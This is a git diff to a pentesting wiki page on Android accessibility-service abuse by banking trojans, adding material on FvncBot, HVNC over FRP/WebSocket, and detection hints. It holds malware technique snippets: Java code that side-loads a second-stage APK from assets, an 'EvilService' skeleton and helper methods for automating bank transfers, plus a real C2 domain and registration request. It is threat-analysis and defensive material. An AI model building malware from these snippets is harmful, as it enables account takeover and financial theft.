diff --git a/src/mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md b/src/mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
index e37e673a3e5..3e46b049d4a 100644
--- a/src/mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
+++ b/src/mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
@@ -53,6 +53,9 @@ The companion XML defines how the fake dialog will look like:
## Remote UI automation primitives
+
+Sample AccessibilityService automation
+
```java
public class EvilService extends AccessibilityService {
@Override
@@ -74,6 +77,8 @@ public class EvilService extends AccessibilityService {
}
```
+
+
With only these two APIs an attacker can:
* Unlock the screen, open the banking app, navigate its UI tree and submit a transfer form.
* Accept every permission dialog that pops up.
@@ -103,7 +108,39 @@ The victim types credentials into the fake form while the background app receive
Malware families such as **PlayPraetor** maintain a persistent WebSocket channel where the operator can issue high-level commands (`init`, `update`, `alert_arr`, `report_list`, …). The service translates those commands into the low-level gestures above, achieving real-time unauthorized transactions that easily bypass multi-factor-authentication tied to that very device.
### 3. Screen streaming & monitoring
-By combining the **MediaProjection API** with an RTMP client library, the RAT can broadcast the live framebuffer to `rtmp://:1935/live/`, giving the adversary perfect situational awareness while the Accessibility engine drives the UI.
+By combining the **MediaProjection API** with an RTMP client library, the RAT can broadcast the live framebuffer to `rtmp://:1935/live/`, giving the adversary perfect situational awareness while the Accessibility engine drives the UI. Newer banking trojans additionally bootstrap a **Fast Reverse Proxy (FRP)** binary and upgrade it to a **WebSocket** stream when an `enable_ws` (or similar) push command arrives. That bi-directional socket carries high-frequency screenshots and synthetic gestures, effectively giving the operator an **HVNC session** that works even when the victim cannot notice anything on screen.
+
+### 4. Session-based multi-stage installers
+Android 13+ aggressively throttles background installs invoked through spoofed accessibility clicks. A common workaround is to **embed the second-stage APK under `assets/`** and side-load it with the **session-based `PackageInstaller` API** so the loader controls the whole UX while the origin of the payload remains opaque to the user:
+
+```java
+PackageInstaller pi = getPackageManager().getPackageInstaller();
+int id = pi.createSession(new SessionParams(SessionParams.MODE_FULL_INSTALL));
+try (Session s = pi.openSession(id);
+ InputStream in = getAssets().open("com.fvnc.app.apk");
+ OutputStream out = s.openWrite("base.apk", 0, -1)) {
+ in.transferTo(out);
+ s.commit(PendingIntent.getBroadcast(this, 0, new Intent(this, InstallReceiver.class), 0).getIntentSender());
+}
+```
+
+*Steps seen in the wild*
+1. Drop the payload unencrypted in `assets/`.
+2. Open a session, stream the bytes, commit and immediately deep-link the victim into the Accessibility settings so the second stage can be activated.
+3. Report installation status (success/failure) back to the loader C2 for infection tracking.
+
+The install dialog still appears, but everything else (UI strings, fake “security component” prompts, telemetry) is under attacker control.
+
+### 5. Accessibility keylogging buffers & real-time exfiltration
+Instead of hooking the keyboard, the RAT subscribes to `TYPE_VIEW_TEXT_CHANGED`, `TYPE_VIEW_FOCUSED`, `TYPE_WINDOW_STATE_CHANGED`, etc. Every event becomes a log record containing the focused app/activity, widget coordinates, and the actual text. Operators implement a **ring buffer** (e.g., 1 000 events) that is flushed over HTTP when full, while an active WebSocket tunnel streams the same events immediately to capture OTPs before they expire. Because everything happens inside the Accessibility service, no additional permissions are needed and foreground UI never shows a “keyboard” indicator.
+
+### 6. Web-inject overlays with WebView bridges
+Overlay phishing is no longer just a static HTML asset. Modern kits:
+* Keep a **configuration file in `SharedPreferences`** mapping package names → overlay template URLs, per-app locale strings, and capture requirements.
+* Inflate a full-screen `WebView` from the Accessibility service, load the remote phishing page, and register a `@JavascriptInterface` so JavaScript can post captured credentials/PINs/Card data straight back to native code.
+* Close the overlay OR launch the ATS automation module once the victim has typed everything, ensuring the real banking app underneath receives the same touches (so transfers happen in the legitimate UI session).
+
+This approach eliminates the Play Store “draw over other apps” dialog, gives operators on-the-fly phishing templates, and works across multiple banks without shipping new APKs.
---
@@ -125,6 +162,41 @@ The **AccessibilityService** is the local engine that turns those cloud commands
---
+## FvncBot-style loader & C2 fingerprints
+
+### Cleartext registration endpoints
+The FvncBot payload registers itself over plain HTTP (`naleymilva.it.com`) using static JSON structures, making the traffic trivial to fingerprint and replay in sandboxes.
+
+```http
+POST /api/v1/devices/register HTTP/1.1
+Host:
+Content-Type: application/json
+
+{
+ "device_id": "device_",
+ "fcm_token": "",
+ "device_info": { ... },
+ "optimization_stats": { ... }
+}
+```
+
+* `device_info` enumerates manufacturer, model, Android API level, app version, and screen size so operators can prioritise valuable hardware.
+* `optimization_stats` reports OEM power-management knobs (aggressiveness score, polling interval, foreground-service flag), allowing the C2 to decide when to wake modules or keep them dormant.
+* Campaign-specific values such as `build_id = "call_pl"` or `1.0-P` instantly reveal geo-targeting in passive network captures.
+
+### Push-to-WebSocket escalation
+Initial orchestration is done through **Firebase Cloud Messaging (FCM)**. When the bot receives the `enable_ws` (or equivalent) push command it launches an embedded **Fast Reverse Proxy (FRP)** client, pivots through the operator infrastructure, and upgrades the tunnel to a WebSocket session. That session multiplexes:
+* Low-latency screen streaming frames (better than periodic HTTP uploads).
+* Real-time forwarding of Accessibility keylogging events.
+* Synthetic gestures/keyboard events that provide an invisible **HVNC** channel over the victim’s legitimate banking session.
+
+The loader keeps reporting install/activation progress to the same telemetry host, so defenders can sinkhole the endpoint and immediately enumerate compromised builds.
+
+### Leveraging debug artefacts for hunting
+Even heavily obfuscated samples often keep developer log strings such as “WS connected”, “keylog buffer flushed”, etc. Analysts can patch the downloaded DEX modules to force the debug branches to execute and then observe deterministic markers in `logcat`. Threat hunters can monitor managed fleets for those strings or for suspicious FRP/`frpc` processes being spawned from non-system apps.
+
+---
+
## Detecting malicious accessibility services
* `adb shell settings get secure enabled_accessibility_services`
@@ -134,6 +206,10 @@ The **AccessibilityService** is the local engine that turns those cloud commands
```bash
adb shell dumpsys accessibility | grep "Accessibility Service"
```
+* Network telemetry should flag **cleartext POSTs to `/api/v1/devices/register`** (often pointing to look-alike banking domains) when the JSON body contains both `device_info` and `optimization_stats` objects.
+* Monitor for user-installed apps invoking `PackageInstaller.Session` immediately after reading APK bytes from their own `assets/` directory—this is characteristic of staged loaders like the fake “mBank security key”.
+* EDR/MDM agents can alert when an app spawns binaries named `frp`/`frpc` or opens persistent WebSocket tunnels shortly after receiving an FCM push notification.
+* Collect `logcat` from quarantined devices and search for leftover developer strings such as “enable_ws”, “KeyloggerBufferSend”, or “WS reconnect”, which remain readable even when classes are otherwise obfuscated.
---
@@ -149,6 +225,9 @@ The **AccessibilityService** is the local engine that turns those cloud commands
## ATS automation cheat-sheet (Accessibility-driven)
Malware can fully automate a bank app with only Accessibility APIs. Generic primitives:
+
+Common helper methods
+
```java
// Helpers inside your AccessibilityService
private List byText(String t){
@@ -174,6 +253,8 @@ private void tap(float x, float y){
}
```
+
+
Example flow (Czech → English labels):
- "Nová platba" (New payment) → click
- "Zadat platbu" (Enter payment) → click
@@ -233,7 +314,7 @@ Observed flows for MetaMask, Trust Wallet, Blockchain.com and Phantom:
## NFC-relay orchestration
Accessibility/RAT modules can install and launch a dedicated NFC-relay app (e.g., NFSkate) as a third stage and even inject an overlay guide to shepherd the victim through card-present relay steps.
-Background and TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay
+Background and TTPs: [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
---
@@ -242,5 +323,6 @@ Background and TTPs: https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-t
* [Android accessibility documentation – Automating UI interaction](https://developer.android.com/guide/topics/ui/accessibility/service)
* [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats)
* [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay)
+* [Intel 471 – New FvncBot Android banking trojan targets Poland](https://www.intel471.com/blog/new-fvncbot-android-banking-trojan-targets-poland)
{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file